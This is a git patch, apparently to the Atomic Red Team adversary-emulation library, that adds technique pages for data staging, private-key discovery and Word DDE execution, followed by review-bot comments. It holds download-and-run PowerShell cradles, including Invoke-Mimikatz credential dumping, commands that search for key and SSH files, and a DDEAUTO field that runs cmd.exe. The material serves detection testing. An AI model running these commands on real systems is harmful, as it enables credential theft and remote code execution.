From 8ba1dc8a194c602c2d41d10461b99e657e929fec Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Thu, 8 Mar 2018 14:26:18 -0600 Subject: [PATCH] Technique Adds Private Keys - Find them DDE - Reference: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ Data Staged --- Windows/Collection/Data_Staged.md | 9 +++++++++ Windows/Credential_Access/Private_Keys.md | 16 ++++++++++++++++ Windows/Execution/Dynamic_Data_Exchange.md | 19 +++++++++++++++++++ Windows/Execution/PowerShell.md | 2 +- Windows/README.md | 6 +++--- 5 files changed, 48 insertions(+), 4 deletions(-) create mode 100644 Windows/Collection/Data_Staged.md create mode 100644 Windows/Credential_Access/Private_Keys.md create mode 100644 Windows/Execution/Dynamic_Data_Exchange.md diff --git a/Windows/Collection/Data_Staged.md b/Windows/Collection/Data_Staged.md new file mode 100644 index 00000000..3a69b731 --- /dev/null +++ b/Windows/Collection/Data_Staged.md @@ -0,0 +1,9 @@ +# Data Staged + +MITRE ATT&CK Technique: [T1074](https://attack.mitre.org/wiki/Technique/T1074) + +### Stage data from Discovery.bat + +Input: + + powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > c:\windows\pi.log diff --git a/Windows/Credential_Access/Private_Keys.md b/Windows/Credential_Access/Private_Keys.md new file mode 100644 index 00000000..4d8537e7 --- /dev/null +++ b/Windows/Credential_Access/Private_Keys.md @@ -0,0 +1,16 @@ +# Private Keys + +MITRE ATT&CK Technique: [T1145](https://attack.mitre.org/wiki/Technique/T1145) + +File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc + +Input: + +Make some files: + +echo "ATOMICREDTEAM" > %windir%\cert.key + dir C:\Users\(username)\.ssh\ + +Find files: + + dir c:\ /b /s .key | findstr /e .key 
diff --git a/Windows/Execution/Dynamic_Data_Exchange.md b/Windows/Execution/Dynamic_Data_Exchange.md new file mode 100644 index 00000000..0e7e4c8c --- /dev/null +++ b/Windows/Execution/Dynamic_Data_Exchange.md @@ -0,0 +1,19 @@ +# Dynamic Data Exchange + +MITRE ATT&CK Technique: [T1173](https://attack.mitre.org/wiki/Technique/T1173) + + +### Microsoft Word + +Open, + +Insert tab -> Quick Parts -> Field + +Choose = (Formula) and click ok. + +After that, you should see a Field inserted in the document with an error “!Unexpected End of Formula”, right-click the Field, and choose Toggle Field Codes. + +The Field Code should now be displayed, change it to Contain the following: + + + {DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" } diff --git a/Windows/Execution/PowerShell.md b/Windows/Execution/PowerShell.md index f59eccf5..54085c5b 100644 --- a/Windows/Execution/PowerShell.md +++ b/Windows/Execution/PowerShell.md @@ -4,7 +4,7 @@ MITRE ATT&CK Technique: [T1086](https://attack.mitre.org/wiki/Technique/T1086) ### Download Mimikatz and Dump credentials - powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" + powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" ### Download and Execute BloodHound diff --git a/Windows/README.md b/Windows/README.md index 47528df1..4b49bc23 100644 --- a/Windows/README.md +++ b/Windows/README.md 
@@ -3,17 +3,17 @@ | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | |-------------------------------------------------------|----------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | Command-Line Interface | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | -| AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | Dynamic Data Exchange | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | +| AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | [Dynamic Data Exchange](Execution/Dynamic_Data_Exchange.md) | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | | [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | 
Exploitation of Vulnerability | Execution through API | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy | | [Application Shimming](Persistence/Application_Shimming.md) | AppInit DLLs | Code Signing | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Service Scanning | [Logon Scripts](Persistence/Logon_Scripts.md) | Execution through Module Load | [Clipboard Data](Collection/Clipboard_Data.md) | Data Transfer Size Limits | Custom Command and Control Protocol | -| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | Data Staged | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | +| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | [Data Staged](Collection/Data_Staged.md) | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | | Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | | [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | | [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | 
Remote File Copy | [Mshta](Execution/Mshta.md) | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting | | Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels | | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels | | [Create Account](Credential_Access/Create_Account.md) | Hooking | Exploitation of Vulnerability | Password Filter DLL | [Security Software Discovery](Discovery/Security_Software_Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Man in the Browser | | Multi-hop Proxy | -| DLL Search Order Hijacking | Image File Execution Options Injection | Extra Window Memory Injection | Private Keys | [System Information Discovery](Discovery/System_Information_Discovery.md) | Taint Shared Content | [Rundll32](Execution/rundll32.md) | Screen Capture | | Multiband Communication | +| DLL Search Order Hijacking | Image File Execution Options Injection | Extra Window Memory Injection | [Private Keys](Credential_Access/Private_Keys.md) | [System Information Discovery](Discovery/System_Information_Discovery.md) | Taint Shared Content | [Rundll32](Execution/rundll32.md) | Screen Capture | | Multiband Communication | | External Remote Services | [New Service](Persistence/New_Service.md) | [File Deletion](Defense_Evasion/File_Deletion.md) | Replication Through Removable Media | [System Network 
Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | Third-party Software | Scheduled Task | Video Capture | | Multilayer Encryption | | File System Permissions Weakness | Path Interception | File System Logical Offsets | Two-Factor Authentication Interception | System Network Connections Discovery | [Windows Admin Shares](Lateral_Movement/Windows_Admin_Shares.md) | Scripting | | | Remote File Copy | | [Hidden Files and Directories](Defense_Evasion/Hidden_Files_and_Directories.md) | Port Monitors | [Hidden Files and Directories](Defense_Evasion/Hidden_Files_and_Directories.md) | | [System Owner/User Discovery](Discovery/System_Owner-User_Discovery.md) | [Windows Remote Management](Lateral_Movement/Windows_Remote_Management.md) | Service Execution | | | Standard Application Layer Protocol |
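Review bot: In the `Data_Staged.md` hunk, the command under `### Stage data from Discovery.bat` passes a `.bat` file to `IEX`, which parses the downloaded text as PowerShell rather than batch, so the script will mostly error instead of executing; if the intent is to run it, download it to disk and invoke it through `cmd /c`, or supply a `.ps1` payload. The redirect to `c:\windows\pi.log` also requires an elevated prompt, and the file gives no cleanup step for that log; a line stating that the test must run as administrator plus a `del c:\windows\pi.log` cleanup would make the test reproducible.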
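Review bot: Two typos on the `File extensions include:` line of `Private_Keys.md`: `.ppk.` carries a trailing period and `pfx` is missing its leading dot. The commands under `Make some files:` are formatted inconsistently, `echo "ATOMICREDTEAM" > %windir%\cert.key` is flush left and will render as prose while the `dir` line below it is indented as code; indent both. `dir C:\Users\(username)\.ssh\` lists files rather than creating them, so it belongs under `Find files:`, and in `dir c:\ /b /s .key | findstr /e .key` consider writing the pattern explicitly as `*.key`. Writing to `%windir%` needs an elevated prompt, and there is no cleanup for `%windir%\cert.key`.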
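Review bot: The SensePost reference (https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/) appears only in the commit message; add it to `Dynamic_Data_Exchange.md` so readers of the technique file see the source. The step list opens with a dangling `Open,` (presumably `Open Microsoft Word,`), `click ok` should read `click OK`, and the quotation marks around `!Unexpected End of Formula` are curly quotes. The `{DDEAUTO ... }` line is also preceded by two blank lines and indented deeper than the other code lines in this patch; one blank line and the same four-space indent would keep the rendering consistent.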
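Review bot: The `PowerShell.md` hunk swaps the Invoke-Mimikatz source from the repository's own `Windows/Payloads/Invoke-Mimikatz.ps1` to `mattifestation/PowerSploit/master`, but the commit message (Private Keys, DDE, Data Staged) does not mention this change or why the in-repo payload was dropped. Either split it into its own commit with a rationale, or at minimum pin the URL to a specific commit instead of `master` so the test does not change silently when the upstream repository does.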